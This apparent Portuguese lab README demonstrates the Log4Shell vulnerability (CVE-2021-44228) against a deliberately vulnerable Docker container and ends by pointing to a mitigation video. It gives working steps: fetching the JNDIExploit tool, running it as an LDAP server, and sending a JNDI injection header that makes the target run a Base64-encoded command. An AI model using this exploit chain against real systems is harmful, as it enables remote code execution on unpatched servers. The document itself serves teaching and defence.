
Este repositório é para demonstração e mitigação da vulnerabilidade Log4j 2021 (CVE-2021-44228).
Este repositório é para demonstração e mitigação da vulnerabilidade Log4j 2021 (CVE-2021-44228).
A vulnerabilidade CVE-2021-44228 / Log4Shell consiste em injetar em software vulnerável um payload malicioso, que fará o Log4J obter um valor de uma fonte de terceiros, usando JNDI e através do protocolo LDAP. ... Os dados importados podem ser código, que será executado pelo Log4J no sistema.
Executamos um aplicativo web Spring Boot vulnerável ao CVE-2021-44228 no Docker, apelidado de Log4Shell por @christophetd.
Ele usa Log4j 2.14.1 (através de spring-boot-starter-log4j2 2.6.1) e o JDK 1.8.0_181.
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Baixamos o JNDI Exploit para Log4Shell do web archive neste caso, mas você pode baixá-lo de onde estiver disponível.
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

Obtemos o endereço IP da nossa máquina que está executando o docker do aplicativo Log4Shell.
ifconfig

Descompactamos o zip com o JNDI Exploit para Log4Shell, obtendo assim o JAR e o executamos colocando o nosso IP obtido no passo 3.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Vídeo de como mitigar a vulnerabilidade Log4Shell no Windows e Linux: MITIGAÇÃO

Feryael Justice 2022